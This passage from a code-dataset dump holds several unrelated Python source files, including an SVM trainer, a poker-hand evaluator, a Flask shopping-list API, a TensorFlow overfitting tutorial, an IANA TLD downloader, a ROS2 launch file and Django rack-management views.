np.ones((badDataTraining.shape[0], 1))\n \n okData = np.fromfile(okfile).reshape((-1,8))\n okDataTraining = okData[0:int(okData.shape[0] * 0.8),:]\n okClassTraining = np.zeros((okDataTraining.shape[0], 1))\n \n trainingData = np.float32(np.vstack((badDataTraining, okDataTraining)))\n responses = np.int32(np.vstack((badClassTraining, okClassTraining)))[:,0]\n \n badMultiply = float(okClassTraining.size) / (badClassTraining.size + okClassTraining.size)\n okMultiply = float(badClassTraining.size) / (badClassTraining.size + okClassTraining.size)\n \n bestScore = 0\n bestC = 0\n bestG = 0\n \n for _ in range (0,5):\n\n data_train, data_test, labels_train, labels_test = train_test_split(trainingData, responses, test_size=0.20, random_state=42)\n \n C_range = np.logspace(-2, 10, 13)\n gamma_range = np.logspace(-9, 3, 13)\n for c in C_range:\n for g in gamma_range:\n svm = cv2.ml.SVM_create()\n svm.setType(cv2.ml.SVM_C_SVC)\n svm.setKernel(cv2.ml.SVM_RBF)\n svm.setGamma(g)\n svm.setC(c)\n svm.setClassWeights(np.array([badMultiply, okMultiply]))\n \n svm.train(data_train, cv2.ml.ROW_SAMPLE, labels_train)\n \n output = svm.predict(data_test)[1].ravel()\n \n correct = np.sum(output == labels_test)\n total = output.size\n score = np.float32(correct) / total\n\n correctBad = np.sum(output[:labels_test.size] == labels_test[:labels_test.size])\n scoreBad = np.float32(correctBad) / labels_test.size\n \n totalScore = 3 * scoreBad + score\n \n if totalScore > bestScore:\n bestScore = totalScore\n bestC = c\n bestG = g\n \n svm = cv2.ml.SVM_create()\n svm.setType(cv2.ml.SVM_C_SVC)\n svm.setKernel(cv2.ml.SVM_RBF)\n svm.setGamma(bestG)\n svm.setC(bestC)\n svm.setClassWeights(np.array([badMultiply, okMultiply]))\n 
svm.train(trainingData, cv2.ml.ROW_SAMPLE, responses)\n \n svm.save(saveLocation)\n \n ","sub_path":"Code/rbfClassifier.py","file_name":"rbfClassifier.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"108063193","text":"def cat_dog(str):\n catCount = 0\n dogCount = 0\n for i in range(len(str)-2):\n if str[i:i+3] == \"cat\":\n catCount += 1\n if str[i:i+3] == \"dog\":\n dogCount += 1\n if catCount == dogCount:\n return True\n return False\n \n \n\n \n \n","sub_path":"string-2/cat_dog.py","file_name":"cat_dog.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"347186124","text":"\n\n#calss header\nclass _ENDANGERED():\n\tdef __init__(self,): \n\t\tself.name = \"ENDANGERED\"\n\t\tself.definitions = [u'animals or plants that may soon not exist because there are very few now alive']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_endangered.py","file_name":"_endangered.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"230289410","text":"from setuptools import setup\nimport os\n\ndef prepare_sources():\n srcdir = \"src/remclient\"\n modules = [\"__init__.py\", \"remclient.py\", \"constants.py\"] \n if not os.path.isdir(srcdir):\n os.makedirs(srcdir)\n for filename in modules:\n target = os.path.join(\"src/remclient\", filename)\n if os.path.islink(target) or os.path.isfile(target):\n os.unlink(target)\n os.symlink(os.path.join(\"../..\", filename), target)\n\n\nprepare_sources()\n\nsetup(\n name = \"remclient\",\n description = \"client library for REM server; see at https://github.com/heni/rem\",\n maintainer = \"Eugene Krokhalev\",\n maintainer_email = \"Eugene.Krokhalev@gmail.com\",\n version = \"1.0.6\",\n packages = [ \"remclient\" ],\n package_dir = { '': \"src\" },\n scripts = [ \"rem-tool\" ],\n install_requires = [ \"six\"],\n classifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Operating System :: POSIX :: BSD\",\n \"Operating System :: POSIX :: Linux\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: System :: Systems Administration\",\n \"Topic :: Software Development\"\n ]\n)\n","sub_path":"client/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"605981923","text":"from functools import total_ordering\n \nclass Hand(object):\n #Construtor da classe\n def __init__(self, param):\n #Atribuicao de valores nos atributos da classe\n self.order = [\"High Card\", \"One Pair\", \"Two Pairs\",\"Three of a Kind\", \"Straight\",\n \"Flush\", \"Full House\", \"Four of a Kind\", \"Straight Flush\"]\n self.cards = param\n self.hand = \"High Card\"\n self.rank = 2\n self.parse_cards()\n \n def parse_cards(self):\n #Dictionary - key:value\n c = {\"2\": 2, \"3\": 3, \"4\": 4, \"5\": 5, \"6\": 6, \"7\": 7, \"8\": 8, \"9\": 9, 
\"T\": 10, \"J\": 11, \"Q\": 12, \"K\": 13,\"A\": 14}\n #Lista de cartas conforme Dictionary\n cards = {(c[i[0]], i[1]) for i in self.cards.split()}\n #Lista de Naipes\n colors = [i[1] for i in cards]\n #Ordena valores das cartas\n values = sorted([i[0] for i in cards])\n #Atribuicao de valores nos atributos da classe\n self.values = values\n self.cards = cards\n\n #Cria uma lista distinta dos naipes e retorna a quantidade de naipes distintos\n if len(set(colors)) == 1: \n if self._consecutive_number(values):\n self.hand = \"Straight Flush\"\n self.rank = values[-1]\n return\n self.hand = \"Flush\"\n #Ultimo valor do array: maior valor\n self.rank = values[-1]\n return\n \n if self._consecutive_number(values):\n self.hand = \"Straight\"\n #Ultimo valor do array: maior valor\n self.rank = values[-1]\n return\n \n # Iterando valores do Dictionary c\n for i in c.values():\n if values.count(i) == 4:\n self.hand = \"Four of a Kind\"\n self.rank = i\n return\n \n if values.count(i) == 3:\n #Cria uma lista distinta dos valores e retorna a quantidade de valores distintos\n if len(set(values)) == 2:\n self.hand = \"Full House\"\n self.rank = i\n return\n else:\n self.hand = \"Three of a Kind\"\n self.rank = i\n return\n\n # Iterando valores do Dictionary c\n for i in c.values():\n if values.count(i) == 2:\n for j in c.values():\n if j == i:\n continue\n if values.count(j) == 2:\n self.hand = \"Two Pairs\"\n self.rank = (max(i, j), min(i, j))\n return\n self.hand = \"One Pair\"\n self.rank = i\n return\n \n self.rank = values[-1]\n \n def _consecutive_number(self, param):\n # Verifica valores distintos\n if len(set(param)) != 5:\n return False\n # Verifica se valores consecutivos\n if param[-1] - param[0] == 4:\n return True\n return False\n \n # Funcao de comparacao de objeto: a > b\n def __gt__(self, c):\n if c.hand == self.hand:\n if self.rank == c.rank:\n # Inverte lista e verifica lista maiores valores\n return list(reversed(self.values)) > list(reversed(c.values))\n return self.rank > c.rank\n # Verifica qual ordem e maior pelo index\n return self.order.index(self.hand) > self.order.index(c.hand)\n \nw = []\nwith open(\"poker.txt\") as f:\n # Retonar um iterator \n for index, item in enumerate(f):\n p1 = Hand(item[:14])\n p2 = Hand(item[15:])\n # Utiliza funcao __gt__\n if p1>p2:\n winner = 1\n else:\n winner = 2\n \n w.append(winner)\n# Quantidade de elementos 1 no array\nprint(w.count(1))\n","sub_path":"EulerProblemPython.py","file_name":"EulerProblemPython.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"303436890","text":"#-*-coding:utf-8-*-\nfrom flask import Flask, request, json\nfrom datetime import datetime\nimport os\n\napp = Flask(__name__)\n\ncommonResponse = {\n 'version': '2.0',\n 'resultCode': 'OK',\n 'output': {}\n}\n\nshoppingItems = [\n ['간장', '2021-09-20'],\n ['설탕', '2021-09-27'],\n ['토마토', '2021-10-10'],\n]\n\ndef getUtteranceParameter () :\n data = request.get_json()\n return data['action']['parameters']\n\n@app.route('/')\ndef index():\n return 'Hello Flask'\n\n@app.route('/createItems', methods=['POST'])\ndef createItems():\n\n utteranceParameter = getUtteranceParameter()\n utteranceValue = utteranceParameter['item']['value']\n\n response = commonResponse\n\n response['output']['existYn'] = 'N'\n\n for i in shoppingItems :\n if i[0] == utteranceValue :\n response['output']['existYn'] = 'Y'\n response['output']['registerDate'] = i[1]\n\n if response['output']['existYn'] == 
'N':\n shoppingItems.append([utteranceValue, datetime.today().strftime('%Y-%m-%d')])\n return json.dumps(response)\n\n@app.route('/readItems', methods=['POST'])\ndef readItems():\n\n\n response = commonResponse\n\n response['output']['itemList'] = ''\n itemList = ''\n for i in shoppingItems :\n itemList = itemList + i[0]\n response['output']['itemList'] = itemList\n return json.dumps(response)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5500, debug=True)\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"215201152","text":"\r\n#@title Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# https://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\n#@title MIT License\r\n#\r\n# Copyright (c) 2017 François Chollet\r\n#\r\n# Permission is hereby granted, free of charge, to any person obtaining a\r\n# copy of this software and associated documentation files (the \"Software\"),\r\n# to deal in the Software without restriction, including without limitation\r\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\n# and/or sell copies of the Software, and to permit persons to whom the\r\n# Software is furnished to do so, subject to the following conditions:\r\n#\r\n# The above copyright notice and this permission notice shall be included in\r\n# all copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\r\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\r\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\r\n# DEALINGS IN THE SOFTWARE.\r\n\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nprint(tf.__version__)\r\n\r\nNUM_WORDS = 10000\r\n\r\n(train_data, train_labels), (test_data, test_labels) = keras.datasets.imdb.load_data(num_words=NUM_WORDS)\r\n\r\ndef multi_hot_sequences(sequences, dimension):\r\n # Create an all-zero matrix of shape (len(sequences), dimension)\r\n results = np.zeros((len(sequences), dimension))\r\n for i, word_indices in enumerate(sequences):\r\n results[i, word_indices] = 1.0 # set specific indices of results[i] to 1s\r\n return results\r\n\r\n\r\ntrain_data = multi_hot_sequences(train_data, dimension=NUM_WORDS)\r\ntest_data = multi_hot_sequences(test_data, dimension=NUM_WORDS)\r\n\r\nplt.plot(train_data[0])\r\n\r\nbaseline_model = keras.Sequential([\r\n # `input_shape` is only required here so that `.summary` works. 
\r\n keras.layers.Dense(16, activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\r\n keras.layers.Dense(16, activation=tf.nn.relu),\r\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\r\n])\r\n\r\nbaseline_model.compile(optimizer='adam',\r\n loss='binary_crossentropy',\r\n metrics=['accuracy', 'binary_crossentropy'])\r\n\r\nbaseline_model.summary()\r\n\r\nbaseline_history = baseline_model.fit(train_data,\r\n train_labels,\r\n epochs=20,\r\n batch_size=512,\r\n validation_data=(test_data, test_labels),\r\n verbose=2)\r\n\r\nsmaller_model = keras.Sequential([\r\n keras.layers.Dense(4, activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\r\n keras.layers.Dense(4, activation=tf.nn.relu),\r\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\r\n])\r\n\r\nsmaller_model.compile(optimizer='adam',\r\n loss='binary_crossentropy',\r\n metrics=['accuracy', 'binary_crossentropy'])\r\n\r\nsmaller_model.summary()\r\n\r\nsmaller_history = smaller_model.fit(train_data,\r\n train_labels,\r\n epochs=20,\r\n batch_size=512,\r\n validation_data=(test_data, test_labels),\r\n verbose=2)\r\n\r\nbigger_model = keras.models.Sequential([\r\n keras.layers.Dense(512, activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\r\n keras.layers.Dense(512, activation=tf.nn.relu),\r\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\r\n])\r\n\r\nbigger_model.compile(optimizer='adam',\r\n loss='binary_crossentropy',\r\n metrics=['accuracy','binary_crossentropy'])\r\n\r\nbigger_model.summary()\r\n\r\nbigger_history = bigger_model.fit(train_data, train_labels,\r\n epochs=20,\r\n batch_size=512,\r\n validation_data=(test_data, test_labels),\r\n verbose=2)\r\n\r\ndef plot_history(histories, key='binary_crossentropy'):\r\n plt.figure(figsize=(16,10))\r\n \r\n for name, history in histories:\r\n val = plt.plot(history.epoch, history.history['val_'+key],\r\n '--', label=name.title()+' Val')\r\n plt.plot(history.epoch, history.history[key], color=val[0].get_color(),\r\n label=name.title()+' Train')\r\n\r\n plt.xlabel('Epochs')\r\n plt.ylabel(key.replace('_',' ').title())\r\n plt.legend()\r\n\r\n plt.xlim([0,max(history.epoch)])\r\n\r\n\r\nplot_history([('baseline', baseline_history),\r\n ('smaller', smaller_history),\r\n ('bigger', bigger_history)])\r\n\r\nl2_model = keras.models.Sequential([\r\n keras.layers.Dense(16, kernel_regularizer=keras.regularizers.l2(0.001),\r\n activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\r\n keras.layers.Dense(16, kernel_regularizer=keras.regularizers.l2(0.001),\r\n activation=tf.nn.relu),\r\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\r\n])\r\n\r\nl2_model.compile(optimizer='adam',\r\n loss='binary_crossentropy',\r\n metrics=['accuracy', 'binary_crossentropy'])\r\n\r\nl2_model_history = l2_model.fit(train_data, train_labels,\r\n epochs=20,\r\n batch_size=512,\r\n validation_data=(test_data, test_labels),\r\n verbose=2)\r\n\r\nplot_history([('baseline', baseline_history),\r\n ('l2', l2_model_history)])\r\n\r\ndpt_model = keras.models.Sequential([\r\n keras.layers.Dense(16, activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\r\n keras.layers.Dropout(0.5),\r\n keras.layers.Dense(16, activation=tf.nn.relu),\r\n keras.layers.Dropout(0.5),\r\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\r\n])\r\n\r\ndpt_model.compile(optimizer='adam',\r\n loss='binary_crossentropy',\r\n metrics=['accuracy','binary_crossentropy'])\r\n\r\ndpt_model_history = dpt_model.fit(train_data, train_labels,\r\n epochs=20,\r\n batch_size=512,\r\n validation_data=(test_data, test_labels),\r\n verbose=2)\r\n\r\nplot_history([('baseline', 
baseline_history),\r\n ('dropout', dpt_model_history)])\r\n","sub_path":"dia_2/tensorflow/overfit_and_underfit.py","file_name":"overfit_and_underfit.py","file_ext":"py","file_size_in_byte":7056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"210504413","text":"import hashlib\nimport logging\nimport re\nimport requests\n\nfrom html.parser import HTMLParser\nfrom datetime import datetime\n\n\nclass IANAHTMLParser(HTMLParser):\n \"\"\"Implementation of HTML Parser, specifically for finding the date which\n the latest top level domain list was published by IANA - scraped from\n http://data.iana.org/TLD/\"\"\"\n\n _found_date_line = False\n _found_date = False\n _date = ''\n\n def handle_starttag(self, tag, attrs):\n \"\"\"Look for the table data (td) element of the top level domain list\n \n 1. Look for the href tag containing the tld file\n 2. Find the next table data (td) element - as of 4/2017 this is\n the field that contains the date\n 3. Ignore all other lines.\n \"\"\"\n if self._date == '':\n if not self._found_date:\n if self._found_date_line:\n if tag == 'td':\n self._found_date = True\n else:\n if tag == 'a':\n for attr, value in attrs:\n if attr == 'href':\n if value == 'tlds-alpha-by-domain.txt':\n self._found_date_line = True\n\n def handle_data(self, data):\n \"\"\"Pull the date from the td element. Ignore all other data.\"\"\"\n if self._date == '':\n if self._found_date:\n self._date = datetime.strptime(data.strip(), \"%Y-%m-%d %H:%M\")\n\n @property\n def date(self) -> datetime:\n return self._date\n\n\nclass IANA:\n \"\"\"Class for verifying IANA TLD file and presenting the TLD list\"\"\"\n\n def __init__(self):\n self._tlds = ''\n self._tld_hash = ''\n self._tld_date = ''\n\n @property\n def tlds(self) -> [str]:\n \"\"\"The top level domains in a list\"\"\"\n if len(self._tlds) == 0:\n self._get_tlds()\n return self._tlds\n\n @property\n def tld_date(self) -> datetime:\n \"\"\"The date the top level domains were published by IANA\"\"\"\n if not type(self._tld_date) is datetime:\n self._get_tld_date()\n return self._tld_date\n\n @property\n def tld_hash(self) -> str:\n \"\"\"The md5 hash of the TLD file as published by IANA\"\"\"\n if len(self._tld_hash) < 32:\n self._get_tld_published_hash()\n return self._tld_hash\n\n def _get_tld_published_hash(self) -> None:\n \"\"\"Sets the published hash value of the class object. Called when \n needed by the class (when the tld_hash) property is requested the \n first time.\n \n Raises runtime errors when problems downloading the md5 hash file\n (http://data.iana.org/TLD/tlds-alpha-by-domain.txt.md5) or reading\n the published hash\"\"\"\n # Get IANA TLD list and published md5 hash of file.\n url_md5 = 'http://data.iana.org/TLD/tlds-alpha-by-domain.txt.md5'\n\n try:\n tlds_published_hash = (requests.get(url_md5)).text\n except RuntimeError:\n msg = 'Could not download IANA md5 hash file ({0})'.format(url_md5)\n logging.error(msg)\n raise\n\n # get published md5 hash\n match = re.search('^([a-f0-9]{32})\\s+([a-z.-]+$)', tlds_published_hash)\n if not match:\n msg = 'Could not find md5 hash in IANA file ({0})'.format(url_md5)\n logging.error(msg)\n raise\n\n assert len(match.group(1)) == 32\n self._tld_hash = match.group(1)\n\n def _get_tlds(self) -> None:\n \"\"\"Creates the list of strings containing the TLDs from the published\n IANA file (http://data.iana.org/TLD/tlds-alpha-by-domain.txt). 
Downloads \n the file and validates by checking the published hash\n \n Raises runtime errors when problems downloading the tld file\n or the md5 hash of the downloaded file and the published hash do not match\"\"\"\n url_tld_list = 'http://data.iana.org/TLD/tlds-alpha-by-domain.txt'\n\n try:\n tlds = (requests.get(url_tld_list)).text\n except:\n msg = 'Could not download IANA TLD list ({0})'.format(url_tld_list)\n logging.error(msg)\n raise\n\n tlds_hash = hashlib.md5(tlds.encode('utf-8')).hexdigest()\n\n if not tlds_hash == self.tld_hash:\n msg = 'Downloaded IANA TLD file hash ({0}) did not match provided md5 hash ({1}).'\\\n .format(tlds_hash, self.tld_hash)\n logging.error(msg)\n raise\n\n self._tlds = tlds\n\n def _get_tld_date(self) -> None:\n \"\"\"Sets the published date (IANA TLD file date) of the class object. \n Called when needed by the class (when the tld_hash) property is \n requested the first time.\n \n Raises runtime errors when problems retrieving the TLD page\n (http://data.iana.org/TLD) or the retrieved date was not read correctly.\"\"\"\n url = 'http://data.iana.org/TLD'\n try:\n raw_response = (requests.get(url)).text\n except:\n msg = 'Did not get valid response from TLD site ({0})'.format(url)\n logging.error(msg)\n raise\n\n response = IANAHTMLParser()\n response.feed(raw_response)\n if type(response.date) == datetime:\n self._tld_date = response.date\n else:\n msg = 'Date from ({0}) not in correct datetime format'.format(url)\n raise RuntimeError(msg)\n","sub_path":"iana.py","file_name":"iana.py","file_ext":"py","file_size_in_byte":5470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"515212322","text":"# Copyright 2018 ADLINK Technology, Inc.\n# Developer: HaoChih, LIN (haochih.lin@adlinktech.com)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\n\nfrom ament_index_python.packages import get_package_share_directory\nfrom launch.exit_handler import restart_exit_handler\nfrom ros2run.api import get_executable_path\n\n\ndef launch(launch_descriptor, argv):\n ld = launch_descriptor\n package = 'turtlebot2_drivers'\n ld.add_process(\n cmd=[get_executable_path(package_name=package, executable_name='kobuki_node')],\n name='kobuki_node',\n exit_handler=restart_exit_handler,\n )\n\n package = 'ydlidar'\n ld.add_process(\n cmd=[get_executable_path(package_name=package, executable_name='ydlidar_node')],\n name='ydlidar_node',\n exit_handler=restart_exit_handler,\n )\n\n package = 'tf2_ros'\n ld.add_process(\n # Transform from base_link to laser_frame \n cmd=[\n get_executable_path(\n package_name=package, executable_name='static_transform_publisher'),\n '0.0', '0.0', '0.1',\n '0', '0', '0', '1',\n 'base_link',\n 'laser_frame'\n ],\n name='static_tf_pub_base_rgb',\n exit_handler=restart_exit_handler,\n )\n\t\t\t\n package = 'joy'\n ld.add_process(\n cmd=[get_executable_path(package_name=package, executable_name='joy_node')],\n name='joy_node',\n exit_handler=restart_exit_handler,\n )\n\t\n package = 
'teleop_twist_joy'\n ld.add_process(\n cmd=[get_executable_path(package_name=package, executable_name='teleop_node')],\n name='teleop_node',\n exit_handler=restart_exit_handler,\n )\n\t\n package = 'slam_karto'\n ld.add_process(\n cmd=[get_executable_path(package_name=package, executable_name='slam_karto')],\n name='slam_karto',\n exit_handler=restart_exit_handler,\n )\n\n return ld\n","sub_path":"launch/slam_karto_demo.py","file_name":"slam_karto_demo.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"587941048","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom cmdb.models import Rack \nfrom cmdb.models import IDC\nfrom cmdb.models import HostPhysical\nimport json\nimport urllib\nimport cmdb_log\n\nfrom django.views.decorators.csrf import csrf_exempt\n\n\ndef rack_get_byid(request,id):\n if not request.user.is_authenticated():\n json_r = json.dumps({\"result\":\"no login\"})\n return HttpResponse(json_r)\n id = id\n models = list(Rack.objects.filter(idc=id).values())\n json_r = json.dumps(models)\n return HttpResponse(json_r)\n\n@csrf_exempt \ndef rack_get(request):\n if not request.user.is_authenticated():\n json_r = json.dumps({\"result\":\"no login\"})\n return HttpResponse(json_r)\n key = request.POST.get('key','all')\n rack_list = []\n if key == 'all':\n pageIndex = request.POST.get('pageIndex',0)\n pageSize = request.POST.get('pageSize',100)\n start = int(pageIndex)*int(pageSize)\n stop = int(pageIndex)*int(pageSize) + int(pageSize)\n racks = Rack.objects.select_related().all()\n for rack in racks:\n rack_d = {'IDC_id':rack.idc.IDC_Name,'Rack_Name':rack.Rack_Name,'id':rack.id} \n rack_list.append(rack_d)\n data = {\"total\":len(rack_list),\"data\":rack_list[start:stop]}\n json_r = json.dumps(data)\n elif key == 'id':\n id = request.POST.get('id')\n rack = Rack.objects.get(id=id)\n rack_d = {'IDC_id':rack.idc.id,'Rack_Name':rack.Rack_Name,'id':rack.id}\n json_r = json.dumps(rack_d)\n else:\n racks= Rack.objects.filter(Rack_Name__contains=key)\n for rack in racks:\n rack_d = {'IDC_id':rack.idc.IDC_Name,'Rack_Name':rack.Rack_Name,'id':rack.id} \n rack_list.append(rack_d)\n #data = {\"total\":len(rack_list),\"data\":rack_list}\n json_r = json.dumps(rack_list)\n return HttpResponse(json_r)\n\n@csrf_exempt\ndef rack_search(request):\n if not request.user.is_authenticated():\n return HttpResponseRedirect(\"/ops/cmdb/html/login.html\")\n json_str =request.body\n data = json.loads(json_str)\n key = data['key']\n if key == 'id':\n rack = Rack.objects.get(id=data['id'])\n rack_d = {'IDC_id':rack.idc.id,'Rack_Name':rack.Rack_Name,'id':rack.id}\n json_r = json.dumps(rack_d)\n if key == 'Rack_Name':\n rack_r = list(Rack.objects.filter(Rack_Name__contains=data['Rack_Name']).values())[0]\n json_r = json.dumps(rack_r)\n return HttpResponse(json_r)\n\n@csrf_exempt \ndef rack_save(request):\n if not request.user.is_authenticated():\n json_r = json.dumps({\"result\":\"no login\"})\n return HttpResponse(json_r)\n elif not request.user.has_perm('cmdb.change_rack'):\n json_r = json.dumps({\"result\":\"no permission\"})\n return HttpResponse(json_r)\n json_str = request.body\n data = json.loads(json_str)\n if data['id']:\n r = Rack.objects.filter(id=data['id'])\n i = IDC.objects.get(id=data['IDC_id'])\n message = cmdb_log.cmp(list(r.values())[0],data)\n r.update(Rack_Name = data['Rack_Name'],idc = i)\n 
cmdb_log.log_change(request,r[0],r[0].Rack_Name,message)\n else:\n i = IDC.objects.get(id=data['IDC_id'])\n r = Rack(Rack_Name = data['Rack_Name'],idc = i)\n r.save()\n cmdb_log.log_addition(request,r,r.Rack_Name,data)\n json_r = json.dumps({\"result\":\"save sucess\"})\n return HttpResponse(json_r)\n\n@csrf_exempt\ndef rack_del(request):\n if not request.user.is_authenticated():\n json_r = json.dumps({\"result\":\"no login\"})\n return HttpResponse(json_r)\n elif not request.user.has_perm('cmdb.change_rack'):\n json_r = json.dumps({\"result\":\"no permission\"})\n return HttpResponse(json_r)\n json_str =request.body\n data = json.loads(json_str)\n ids = data['id'].split(',')\n for del_id in ids:\n i = Rack.objects.filter(id=del_id)\n h = HostPhysical.objects.filter(rack=del_id)\n if len(h):\n json_r = json.dumps({\"result\":\"include hosts\"})\n return HttpResponse(json_r)\n cmdb_log.log_deletion(request,i[0],i[0].Rack_Name,data)\n i.delete()\n json_r = json.dumps({\"result\":\"delete sucess\"}) \n return HttpResponse(json_r)\n","sub_path":"cmdb/object_rack_views.py","file_name":"object_rack_views.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"180298596","text":"__author__ = 'MarinaFomicheva'\n\nimport scipy.stats as stats\nfrom collections import defaultdict\nimport numpy as np\nimport math\n\ndef test_normality(data):\n\n transformed = log_transform(data)\n results = []\n\n for phrase in sorted(transformed.keys()):\n t, p = stats.shapiro(transformed[phrase])\n results.append(p)\n\n return results\n\ndef log_transform(data):\n\n transformed = defaultdict(list)\n\n for phrase in sorted(data.keys()):\n for val in data[phrase]:\n transformed[phrase].append(math.log10(val + 1))\n\n return transformed\n\n\n","sub_path":"lognormal_test.py","file_name":"lognormal_test.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"138052671","text":"T=int(input())\nfor m in range(T):\n N=int(input())\n string=input().split(\" \")\n result=[]\n for i in range(N):\n string[i]=int(string[i])\n for i in range(N):\n index=1\n for j in range(i+1,N):\n if string[j]>string[i]:\n index=0\n if index==1:\n result.append(string[i])\n print(\" \".join(str(i) for i in result))\n","sub_path":"Code/CodeRecords/2281/60722/273569.py","file_name":"273569.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"553939297","text":"__author__ = 'thomas'\n\nimport logging\n\ndef init(log_file_name, withFile):\n global logger\n logger = logging.getLogger(__name__)\n\n # logger = logging.getLogger(__name__)\n # logging.basicConfig(level=logging.INFO,filename='example.log')\n\n log_level=logging.INFO\n logger.setLevel(log_level)\n\n # create console handler\n ch = logging.StreamHandler()\n ch.setLevel(log_level)\n # create formatter and add it to the handlers\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n logger.addHandler(ch)\n ch.setFormatter(formatter)\n\n if withFile:\n # create file handler which logs even debug messages\n fh = logging.FileHandler(log_file_name)\n fh.setLevel(log_level)\n fh.setFormatter(formatter)\n # add the handlers to the logger\n logger.addHandler(fh)\n\n # return 
logger\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"117747757","text":"from django.urls import path\r\nfrom website.views import IndexTemplateView, FuncionarioListView, SetorListView, FuncionarioUpdateView, SetorUpdateView, FuncionarioDeleteView, SetorDeleteView, FuncionarioCreateView, SetorCreateView\r\n\r\napp_name = 'website'\r\n\r\nurlpatterns = [\r\n\r\n\tpath('', IndexTemplateView.as_view(), 